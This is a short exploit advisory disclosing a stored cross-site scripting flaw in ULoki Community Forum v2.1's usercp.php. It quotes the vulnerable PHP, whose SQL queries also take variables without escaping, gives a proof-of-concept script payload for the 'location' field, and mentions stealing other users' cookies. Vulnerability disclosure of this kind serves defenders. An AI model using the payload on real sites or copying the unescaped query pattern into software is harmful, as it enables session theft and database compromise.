ULoki Community Forum version 2.1 suffers from a cross site scripting vulnerability.
a2190948885934c0c63581a1eb71dd1ce98a50ac4b3dd1ed99902c05081c997d
# Exploit Title: ULoki Community Forum v2.1 (usercp.php) Cross Site Scripting
# Date: 10/02/2010
# Author: Sioma Labs
# Software Link: http://www.uloki.com/download/uloki_forum_06_may_2009.zip
# Version: v2.1
# Tested on: Windows SP 2 / WAMP
# CVE :
# Code :
____ _ _ _
/ ___|(_) ___ _ __ ___ __ _ | | __ _| |__ ___
\___ \| |/ _ \| '_ ` _ \ / _` | | | / _` | '_ \/ __|
___) | | (_) | | | | | | (_| | | |___ (_| | |_) \__ \
|____/|_|\___/|_| |_| |_|\__,_| |_____\__,_|_.__/|___/
======================================================
xSS Vuln Page
Vuln C0de (usercp.php)
----------------------
$checke=$db->count_rows("SELECT email FROM b_users WHERE email='$email' AND userid='$user->userid'");
if($checke > 0)
{
print "</td></tr></table>";
$db->update_data("UPDATE b_users SET mb='$mb', location='$loc' WHERE userid='$user->userid'");
err_msg("User CP","Your information has been updated.");
}
-----------------------
http://localhost/forum/usercp.php
POC
----
place this code on "location"
"><script>alert(String.fromCharCode(88, 83, 83));</script>
--------------------------------------------------------
Note
----
If an Attacker prefers the attacking process could be done by stealing cookies of other users
-------------------------
Site: http://siomalabs.com
Author : Sioma Agent 154